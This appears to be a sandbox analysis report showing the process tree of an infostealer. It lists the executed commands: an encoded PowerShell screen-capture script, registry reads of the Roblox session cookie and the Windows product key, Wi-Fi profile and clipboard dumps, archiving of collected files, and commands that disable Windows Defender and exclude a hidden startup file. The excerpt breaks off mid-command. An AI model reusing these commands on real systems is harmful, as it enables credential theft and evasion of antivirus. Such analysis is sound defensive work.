C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hvudpsco\hvudpsco.cmdline"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8B29.tmp" "c:\Users\Admin\AppData\Local\Temp\hvudpsco\CSC1C4DBA54876343C18CA407539746A7.TMP"8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\getmac.exegetmac6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI15762\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\2xjAK.zip" *"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\_MEI15762\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI15762\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\2xjAK.zip" *6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe'"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎​ ​.scr'"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎​ ​.scr'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAg